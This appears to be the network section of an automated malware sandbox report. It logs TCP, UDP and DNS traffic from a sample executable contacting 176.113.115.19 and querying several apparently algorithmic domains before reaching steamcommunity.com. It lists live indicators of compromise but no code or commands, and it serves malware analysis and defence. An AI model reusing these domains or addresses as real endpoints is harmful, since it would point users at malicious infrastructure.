Dec 17, 2024 08:18:44.662570000 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.662623882 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.662663937 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.664450884 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.664505959 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.664608955 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.664650917 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.666336060 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.666402102 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.666435003 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.666471958 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.668229103 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.668287992 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.668292999 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.668328047 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.670192003 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.670258999 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.670300007 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.670340061 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.672039986 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.672095060 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.672421932 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.672468901 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.673871040 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.673927069 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.673938036 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.673974991 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.675740004 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.675796986 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.675843000 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.675884008 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.677658081 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.677712917 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.677753925 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.677791119 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.679490089 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.679568052 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.679605007 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.679640055 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.681416988 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.681473017 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.681490898 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.681526899 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.683324099 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.683381081 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.683389902 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.683424950 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.685183048 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.685247898 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.685281992 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.685317993 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.687133074 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.687155962 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.687195063 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.687218904 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.689018965 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.689074993 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.689110041 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.689145088 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.690844059 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.690896034 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.690938950 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.690973997 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.692728996 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.692797899 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.692847013 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.692892075 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.694605112 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.694662094 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.694700956 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.694736004 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.696518898 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.696573019 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.696604967 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.696641922 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.698363066 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.698385000 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.698427916 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.698427916 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.700275898 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.700325966 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.700381994 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.700417042 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.702172041 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.702225924 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.702254057 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.702290058 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.704062939 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.704118013 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.704154968 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.704191923 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.705944061 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.706012011 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.706027031 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.706063986 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.707806110 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.707863092 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.799968958 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.800009966 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.800112963 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.800134897 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.800721884 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.800818920 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.800822020 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.800863028 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.802242041 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.802289963 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.802897930 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.803035975 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.803078890 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.803078890 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.804344893 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.804451942 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.804470062 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.804511070 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.805820942 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.805877924 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.805936098 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.805983067 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.807360888 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.807420969 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.807444096 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.807482958 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.808804989 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.808866024 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.808868885 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.808903933 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.810292006 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.810358047 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.810415030 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.810457945 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.811739922 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.811790943 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.811811924 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.811846972 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.813178062 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.813230991 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.813296080 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.813343048 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.814718008 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.814771891 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.814862967 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.814908028 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.816065073 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.816121101 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.816142082 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.816179037 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.817435980 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.817490101 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.817507029 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.817543983 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.818824053 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.818878889 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.818909883 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.818947077 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.820156097 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.820226908 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.820247889 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.820285082 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.821576118 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.821633101 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.821641922 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.821680069 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.822855949 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.822916031 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.822978973 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.823024988 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.824165106 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.824223042 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.824291945 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.824337959 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.825524092 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.825581074 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.825609922 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.825648069 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.826836109 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.826898098 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:44.826915026 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:44.826951981 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:48.460630894 CET	49706	443	192.168.2.5	104.131.68.180
Dec 17, 2024 08:18:48.460689068 CET	443	49706	104.131.68.180	192.168.2.5
Dec 17, 2024 08:18:48.460777998 CET	49706	443	192.168.2.5	104.131.68.180
Dec 17, 2024 08:18:48.462017059 CET	49706	443	192.168.2.5	104.131.68.180
Dec 17, 2024 08:18:48.462038994 CET	443	49706	104.131.68.180	192.168.2.5
Dec 17, 2024 08:18:49.209098101 CET	80	49705	176.113.115.19	192.168.2.5
Dec 17, 2024 08:18:49.209176064 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:18:49.777365923 CET	443	49706	104.131.68.180	192.168.2.5
Dec 17, 2024 08:18:49.777440071 CET	49706	443	192.168.2.5	104.131.68.180
Dec 17, 2024 08:18:49.781261921 CET	49706	443	192.168.2.5	104.131.68.180
Dec 17, 2024 08:18:49.781275988 CET	443	49706	104.131.68.180	192.168.2.5
Dec 17, 2024 08:18:49.781584978 CET	443	49706	104.131.68.180	192.168.2.5
Dec 17, 2024 08:18:49.825527906 CET	49706	443	192.168.2.5	104.131.68.180
Dec 17, 2024 08:18:49.827897072 CET	49706	443	192.168.2.5	104.131.68.180
Dec 17, 2024 08:18:49.827922106 CET	49706	443	192.168.2.5	104.131.68.180
Dec 17, 2024 08:18:49.828177929 CET	443	49706	104.131.68.180	192.168.2.5
Dec 17, 2024 08:18:50.284192085 CET	443	49706	104.131.68.180	192.168.2.5
Dec 17, 2024 08:18:50.284291029 CET	443	49706	104.131.68.180	192.168.2.5
Dec 17, 2024 08:18:50.284411907 CET	49706	443	192.168.2.5	104.131.68.180
Dec 17, 2024 08:18:50.285160065 CET	49706	443	192.168.2.5	104.131.68.180
Dec 17, 2024 08:18:50.285213947 CET	443	49706	104.131.68.180	192.168.2.5
Dec 17, 2024 08:18:50.285247087 CET	49706	443	192.168.2.5	104.131.68.180
Dec 17, 2024 08:18:50.285264015 CET	443	49706	104.131.68.180	192.168.2.5
Dec 17, 2024 08:18:50.433207989 CET	49708	443	192.168.2.5	45.77.249.79
Dec 17, 2024 08:18:50.433250904 CET	443	49708	45.77.249.79	192.168.2.5
Dec 17, 2024 08:18:50.433454037 CET	49708	443	192.168.2.5	45.77.249.79
Dec 17, 2024 08:18:50.433814049 CET	49708	443	192.168.2.5	45.77.249.79
Dec 17, 2024 08:18:50.433823109 CET	443	49708	45.77.249.79	192.168.2.5
Dec 17, 2024 08:18:52.338892937 CET	443	49708	45.77.249.79	192.168.2.5
Dec 17, 2024 08:18:52.338975906 CET	49708	443	192.168.2.5	45.77.249.79
Dec 17, 2024 08:18:52.350408077 CET	49708	443	192.168.2.5	45.77.249.79
Dec 17, 2024 08:18:52.350433111 CET	443	49708	45.77.249.79	192.168.2.5
Dec 17, 2024 08:18:52.351262093 CET	443	49708	45.77.249.79	192.168.2.5
Dec 17, 2024 08:18:52.354011059 CET	49708	443	192.168.2.5	45.77.249.79
Dec 17, 2024 08:18:52.354028940 CET	49708	443	192.168.2.5	45.77.249.79
Dec 17, 2024 08:18:52.354171038 CET	443	49708	45.77.249.79	192.168.2.5
Dec 17, 2024 08:18:53.290092945 CET	443	49708	45.77.249.79	192.168.2.5
Dec 17, 2024 08:18:53.290227890 CET	443	49708	45.77.249.79	192.168.2.5
Dec 17, 2024 08:18:53.290314913 CET	49708	443	192.168.2.5	45.77.249.79
Dec 17, 2024 08:18:53.290378094 CET	49708	443	192.168.2.5	45.77.249.79
Dec 17, 2024 08:18:53.290394068 CET	443	49708	45.77.249.79	192.168.2.5
Dec 17, 2024 08:18:53.290407896 CET	49708	443	192.168.2.5	45.77.249.79
Dec 17, 2024 08:18:53.290412903 CET	443	49708	45.77.249.79	192.168.2.5
Dec 17, 2024 08:18:54.778925896 CET	49715	443	192.168.2.5	104.121.10.34
Dec 17, 2024 08:18:54.778966904 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:54.779046059 CET	49715	443	192.168.2.5	104.121.10.34
Dec 17, 2024 08:18:54.779577971 CET	49715	443	192.168.2.5	104.121.10.34
Dec 17, 2024 08:18:54.779592037 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:56.178626060 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:56.178703070 CET	49715	443	192.168.2.5	104.121.10.34
Dec 17, 2024 08:18:56.180638075 CET	49715	443	192.168.2.5	104.121.10.34
Dec 17, 2024 08:18:56.180651903 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:56.181180954 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:56.182602882 CET	49715	443	192.168.2.5	104.121.10.34
Dec 17, 2024 08:18:56.223376989 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:56.932965994 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:56.932986975 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:56.933038950 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:56.933041096 CET	49715	443	192.168.2.5	104.121.10.34
Dec 17, 2024 08:18:56.933054924 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:56.933098078 CET	49715	443	192.168.2.5	104.121.10.34
Dec 17, 2024 08:18:56.933140039 CET	49715	443	192.168.2.5	104.121.10.34
Dec 17, 2024 08:18:57.110771894 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:57.110861063 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:57.110878944 CET	49715	443	192.168.2.5	104.121.10.34
Dec 17, 2024 08:18:57.110893965 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:57.110937119 CET	49715	443	192.168.2.5	104.121.10.34
Dec 17, 2024 08:18:57.111222029 CET	49715	443	192.168.2.5	104.121.10.34
Dec 17, 2024 08:18:57.111233950 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:57.111268044 CET	49715	443	192.168.2.5	104.121.10.34
Dec 17, 2024 08:18:57.111378908 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:57.111402035 CET	443	49715	104.121.10.34	192.168.2.5
Dec 17, 2024 08:18:57.111628056 CET	49715	443	192.168.2.5	104.121.10.34
Dec 17, 2024 08:18:57.111640930 CET	49715	443	192.168.2.5	104.121.10.34
Dec 17, 2024 08:20:30.232096910 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:20:30.544508934 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:20:31.154181957 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:20:32.372675896 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:20:34.794528961 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:20:39.625622034 CET	49705	80	192.168.2.5	176.113.115.19
Dec 17, 2024 08:20:49.341408014 CET	49705	80	192.168.2.5	176.113.115.19

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 17, 2024 08:18:40.245409966 CET	56639	53	192.168.2.5	1.1.1.1
Dec 17, 2024 08:18:40.391401052 CET	53	56639	1.1.1.1	192.168.2.5
Dec 17, 2024 08:18:48.082320929 CET	61916	53	192.168.2.5	1.1.1.1
Dec 17, 2024 08:18:48.303114891 CET	53	61916	1.1.1.1	192.168.2.5
Dec 17, 2024 08:18:48.315792084 CET	63478	53	192.168.2.5	1.1.1.1
Dec 17, 2024 08:18:48.454016924 CET	53	63478	1.1.1.1	192.168.2.5
Dec 17, 2024 08:18:50.289402962 CET	49702	53	192.168.2.5	1.1.1.1
Dec 17, 2024 08:18:50.427267075 CET	53	49702	1.1.1.1	192.168.2.5
Dec 17, 2024 08:18:53.291661978 CET	51781	53	192.168.2.5	1.1.1.1
Dec 17, 2024 08:18:53.515034914 CET	53	51781	1.1.1.1	192.168.2.5
Dec 17, 2024 08:18:53.516769886 CET	60957	53	192.168.2.5	1.1.1.1
Dec 17, 2024 08:18:53.739248037 CET	53	60957	1.1.1.1	192.168.2.5
Dec 17, 2024 08:18:53.742917061 CET	51454	53	192.168.2.5	1.1.1.1
Dec 17, 2024 08:18:54.050884008 CET	53	51454	1.1.1.1	192.168.2.5
Dec 17, 2024 08:18:54.053891897 CET	62073	53	192.168.2.5	1.1.1.1
Dec 17, 2024 08:18:54.271794081 CET	53	62073	1.1.1.1	192.168.2.5
Dec 17, 2024 08:18:54.274547100 CET	55725	53	192.168.2.5	1.1.1.1
Dec 17, 2024 08:18:54.496803999 CET	53	55725	1.1.1.1	192.168.2.5
Dec 17, 2024 08:18:54.498502970 CET	65226	53	192.168.2.5	1.1.1.1
Dec 17, 2024 08:18:54.636981964 CET	53	65226	1.1.1.1	192.168.2.5
Dec 17, 2024 08:18:54.640297890 CET	62855	53	192.168.2.5	1.1.1.1
Dec 17, 2024 08:18:54.777930021 CET	53	62855	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 17, 2024 08:18:40.245409966 CET	192.168.2.5	1.1.1.1	0xae6e	Standard query (0)	post-to-me.com	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:48.082320929 CET	192.168.2.5	1.1.1.1	0x57d1	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:48.315792084 CET	192.168.2.5	1.1.1.1	0x1950	Standard query (0)	immureprech.biz	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:50.289402962 CET	192.168.2.5	1.1.1.1	0xfd40	Standard query (0)	deafeninggeh.biz	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:53.291661978 CET	192.168.2.5	1.1.1.1	0x2108	Standard query (0)	effecterectz.xyz	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:53.516769886 CET	192.168.2.5	1.1.1.1	0x375f	Standard query (0)	diffuculttan.xyz	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:53.742917061 CET	192.168.2.5	1.1.1.1	0xc066	Standard query (0)	debonairnukk.xyz	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:54.053891897 CET	192.168.2.5	1.1.1.1	0x7d9	Standard query (0)	wrathful-jammy.cyou	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:54.274547100 CET	192.168.2.5	1.1.1.1	0xf856	Standard query (0)	awake-weaves.cyou	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:54.498502970 CET	192.168.2.5	1.1.1.1	0xe940	Standard query (0)	sordid-snaked.cyou	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:54.640297890 CET	192.168.2.5	1.1.1.1	0x88e8	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 17, 2024 08:18:40.391401052 CET	1.1.1.1	192.168.2.5	0xae6e	No error (0)	post-to-me.com		104.21.56.70	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:40.391401052 CET	1.1.1.1	192.168.2.5	0xae6e	No error (0)	post-to-me.com		172.67.179.207	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:48.303114891 CET	1.1.1.1	192.168.2.5	0x57d1	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:48.454016924 CET	1.1.1.1	192.168.2.5	0x1950	No error (0)	immureprech.biz		104.131.68.180	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:48.454016924 CET	1.1.1.1	192.168.2.5	0x1950	No error (0)	immureprech.biz		45.77.249.79	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:48.454016924 CET	1.1.1.1	192.168.2.5	0x1950	No error (0)	immureprech.biz		178.62.201.34	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:50.427267075 CET	1.1.1.1	192.168.2.5	0xfd40	No error (0)	deafeninggeh.biz		45.77.249.79	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:50.427267075 CET	1.1.1.1	192.168.2.5	0xfd40	No error (0)	deafeninggeh.biz		178.62.201.34	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:50.427267075 CET	1.1.1.1	192.168.2.5	0xfd40	No error (0)	deafeninggeh.biz		104.131.68.180	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:53.515034914 CET	1.1.1.1	192.168.2.5	0x2108	Name error (3)	effecterectz.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:53.739248037 CET	1.1.1.1	192.168.2.5	0x375f	Name error (3)	diffuculttan.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:54.050884008 CET	1.1.1.1	192.168.2.5	0xc066	Name error (3)	debonairnukk.xyz	none	none	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:54.271794081 CET	1.1.1.1	192.168.2.5	0x7d9	Name error (3)	wrathful-jammy.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:54.496803999 CET	1.1.1.1	192.168.2.5	0xf856	Name error (3)	awake-weaves.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:54.636981964 CET	1.1.1.1	192.168.2.5	0xe940	Name error (3)	sordid-snaked.cyou	none	none	A (IP address)	IN (0x0001)	false
Dec 17, 2024 08:18:54.777930021 CET	1.1.1.1	192.168.2.5	0x88e8	No error (0)	steamcommunity.com		104.121.10.34	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

post-to-me.com

immureprech.biz

deafeninggeh.biz

steamcommunity.com

176.113.115.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49705	176.113.115.19	80	4724	C:\Users\user\Desktop\DG55Gu1yGM.exe

Timestamp	Bytes transferred	Direction	Data
